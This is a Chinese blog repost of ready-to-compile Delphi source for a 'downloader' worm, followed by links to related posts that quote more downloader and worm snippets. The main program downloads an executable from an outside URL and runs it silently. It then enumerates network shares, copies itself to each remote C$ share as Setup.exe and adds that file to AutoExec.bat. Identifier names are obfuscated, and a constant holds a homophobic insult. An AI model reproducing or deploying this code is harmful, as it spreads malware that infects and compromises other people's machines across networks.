蠕虫功能的下载者源代码

最新推荐文章于 2015-08-08 10:15:28 发布
最新推荐文章于 2015-08-08 10:15:28 发布
阅读量2.2k 收藏 2
点赞数 1
分类专栏: 病毒汇编和调试逆向技术加脱壳 文章标签: string integer network windows path c

http://su.pdxx.com/linkboy/blogview.asp?logID=187&cateID=1

源码公布:可以直接编译.蠕虫部分是国外的代码.

Program a;

Uses
Windows;

Const
krnp : String = 'I want to dedicate this message to '+
'gates. Gates, you suck. Gates'+
'you really are homosexual. etc';

VAR
ww     : String;


function mbgcqsd_(Caller: cardinal; URL: PChar; FileName: PChar;Reserved: LongWord; StatusCB: cardinal):Longword; stdcall; external 'URLMON.DLL' name 'URLDownloadToFileA';
Function LowerCase(const S: string): string;
var
kixoebvq: Integer;
begin
kixoebvq := Length(S);
SetString(Result, PChar(S), kixoebvq);
if kixoebvq > 0 then CharLowerBuff(Pointer(Result), kixoebvq);
end;

Function FileSize(FileName: String): Int64;
Var
  zjzb: THandle;
  exn: TWin32FindData;
Begin
  Result:= -1;

  zjzb:= FindFirstFile(PChar(FileName), exn);
  If zjzb <> INVALID_HANDLE_VALUE Then
  Begin
  Windows.FindClose(zjzb);
  Result:= Int64(exn.nFileSizeHigh) Shl 32 + exn.nFileSizeLow;
  End;
End;

Function ExtractFileName(Str:String):String;
Begin
While Pos('/', Str)>0 Do
  Str := Copy(Str, Pos('/',Str)+1, Length(Str));
Result := Str;
End;

Function ExtractFileExt(s:string):String;
Begin
While Pos('.', S)>0 Do
  S := Copy(S, pos('.', S)+1, Length(s));
Result := S;
End;

function FileExists(const FileName: string): Boolean;
var
  __pqxjj: THandle;
  wgndplz: TWin32FindData;
begin
  __pqxjj := FindFirstFileA(PChar(FileName), wgndplz);
  result:= __pqxjj <> INVALID_HANDLE_VALUE;
  if result then
  begin
  CloseHandle(__pqxjj);
  end;
end;

procedure Enumeration(aResource:PNetResource);
var
qnlshmm: THandle;
kujf_n, mec: DWORD;
wgokq: array[0..1023] of TNetResource;
_fehlq: Integer;
begin
  WNetOpenEnum(2,0,0,aResource,qnlshmm);
  kujf_n:=1024;
  mec:=SizeOf(wgokq);
  while WNetEnumResource(qnlshmm,kujf_n,@wgokq,mec)=0 do
  for _fehlq:=0 to kujf_n-1 do
  begin
  if wgokq[_fehlq].dwDisplayType=RESOURCEDISPLAYTYPE_SERVER then
  ww := ww + copy(LowerCase(wgokq[_fehlq].lpRemoteName),3,MAX_PATH) + #13#10;
  if wgokq[_fehlq].dwUsage>0 then
  Enumeration(@wgokq[_fehlq])
end;
WNetCloseEnum(qnlshmm);
end;

Procedure Network;
Var
x_a : String;
ktkma : TextFile;
Begin
Enumeration(NIL);
While ww <> '' Do Begin
  x_a := Copy(ww, 1, Pos(#13#10, ww)-1);
  Try
  CopyFile(pChar(ParamStr(0)), pChar(x_a + '/C$/Setup.exe'), False);
  If FileExists(pChar(x_a + '/C$/AutoExec.bat')) Then Begin
  AssignFile(ktkma, x_a + '/C$/AutoExec.bat');
  Append(ktkma);
  WriteLn(ktkma, 'Setup.exe');
  CloseFile(ktkma);
  End;
  Except
  ;
  End;
  ww := Copy(ww, Pos(#13#10, ww)+2, Length(ww));
End;
End;


Begin
mbgcqsd_(0, 'http://djyangyong.nease.net/mm.exe', 'C:/win30.exe', 0, 0);
WinExec('C:/win30.exe',0);
Network;

End.

iiprogram
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
莫里斯蠕虫源码
weixin_33734785的博客
11-10 1034
/* Magic numbers the program uses to identify other copies of itself. */#define REPORT_PORT 0x2c5d#define MAGIC_1 0x00148898#define MAGIC_2 0x00874697extern int pleasequit;/* This stops the...
C++ win32 downloader
05-28 1154
#include "stdafx.h”#include “stdio.h”#include “string.h”#include #include #include “tlhelp32.h”#pragma comment(lib,”wininet.lib“)/***********************************************/type
VBS下载者源代码
weixin_30468137的博客
11-26 116
HackGp vbs Set Post = CreateObject(“Msxml2.XMLHTTP”)Set Shell = CreateObject(“Wscript.Shell”)Post.Open “GET”,”http://www.cletter.tk/cletter/1.exe”,0Post.Send()Set aGet = CreateObject(“ADODB.Stream”...
C++ win32 下载者源码
weixin_33910434的博客
10-13 124
#include "stdafx.h”#include “stdio.h”#include “string.h”#include &lt;windows.h&gt;#include &lt;wininet.h&gt;#include “tlhelp32.h”#pragma comment(lib,”wininet.lib“)/************************************...
下载者源码
06-22
下载者源码
VB蠕虫功能母体源代码SRC
10-04
VB蠕虫功能母体源代码SRC是一份详细展示蠕虫病毒功能实现的源代码集合,主要使用Visual Basic编程语言编写。蠕虫病毒是一种自我复制的恶意软件,它能在网络上独立传播,无需人为干预,对计算机系统造成潜在的危害。...
小浩VC++蠕虫源代码全部源码
09-18
【小浩VC++蠕虫源代码全部源码】是一份专门针对VC++编程环境的蠕虫程序源代码集合。蠕虫是一种自我复制的恶意软件,它可以在网络中独立传播,无需用户交互,对计算机系统安全构成严重威胁。这份源代码为学习和研究...
wormydrawing:蠕虫绘图的PhoneGap版本的源代码
05-23
3. **js** 目录:包含JavaScript源代码,其中可能有一个或多个文件,如`app.js`,负责应用的核心逻辑和事件处理。 4. **img** 或 **images** 目录:可能存储应用所需的图像资源,如图标、背景图片等。 5. **config....
卡巴斯基2009源代码
01-31
源代码是软件开发的核心部分,它包含了程序的设计思路、算法实现以及功能逻辑等关键信息。以下是关于卡巴斯基2009源代码的一些详细知识点: 1. **源代码的重要性**:源代码是程序员用编程语言编写的原始程序,它是...
超级病毒保护系统源代码 V2010
05-15
【超级病毒保护系统源代码 V2010】是一份重要的IT资源,它代表了2010年时期计算机安全领域的一种高级防护解决方案。源代码是软件开发的基础,通过分析和学习这份源代码,我们可以深入理解当时反病毒技术的实现方式,...
史上最完整的下载者源代码
11-25
史上最完整的下载者源代码
下载者源码(初学者必备)
07-04
下载者源码 下载者源码 下载者源码 下载者源码 下载者源码 下载者源码
易语言 下载者 (源码)
04-11
易于与下载者源码,绝对原创,且不含API
蠕虫源代码? 戴维·梅纳德(David S.Maynard)-C/C++开发
05-27
蠕虫Forth语言的Worms语言源代码? 由David S. Maynard撰写,摘自David的原始软盘。 有两个版本:Atari 8位蠕虫和Commodore蠕虫Forth语言的蠕虫源代码? 由David S. Maynard撰写,摘自David的原始软盘。 有两个版本可用:Atari 8位和Commodore64。Atari 8位版本:ATR格式的磁盘映像。 这些FORTH磁盘映像不可引导; 首先加载ValForth(可从http://www.atarimania.com/utility-atari-400-800-xl-xe-valforth_17605.html获得),切换到源磁盘,然后键入LIST [屏幕号]。 我还将代码导出到ASCII文件中,以便于阅读。 准将64版本:D64用于
Morris蠕虫源代码
07-15
Morris 蠕虫 源代码Morris 蠕虫 源代码Morris 蠕虫 源代码Morris 蠕虫 源代码Morris 蠕虫 源代码
超小下载者源码
liujiayu2的专栏
08-08 1241
// DL.cpp : Defines the entry point for the application. // #include "stdafx.h" #include #pragma comment(lib,"urlmon.lib") int APIENTRY WinMain(HINSTANCE hInstance, HINSTANCE
黑色技术蠕虫下载者[完整源码]
weixin_34146410的博客
08-30 175
黑色技术蠕虫下载者[完整源码] 2007-10-27 22:02:31  标签:黑色技术蠕虫    [推送到技术圈] 文章作者:教主信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])作者网站:黑色技术 [url]www.Rootkit.com.cn[/url]-------------------...
下载者+(原代码)
liuka的blog
02-04 2368
下载者运行后如果成功下载就会在HKEY_CURRENT_USER/Software/Microsoft/Windows/CurrentVersion/Run下生成Microsoft rigpsnap项自启下载的木马会在WINDOWS/system32下,重新命名为rigpsnap.exe如果由于没有联网或地址错误下载者就会等待10秒后再尝试下载如此反复,知道下载成功下载者的关键代码如下!void
C++下载者源码
Foxfile_Hom的专栏
01-20 2064
#include #include #include #pragma comment (lib, "urlmon.lib") int WINAPI WinMain(HINSTANCE hInstance,HINSTANCE hPrevInstance,LPTSTR lpCmdLine,int nCmdShow) { static char mulu[MAX_PA
什么是蠕虫 绿色代码的源程序
最新发布
05-21
绿色代码是指没有包含恶意代码或病毒的程序源代码。这类代码通常是由开发人员编写用于实现某种功能或解决某个问题的代码。绿色代码通常可以在开源代码库或开发者社区中找到,也可以通过搜索引擎查找相关的代码样例。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值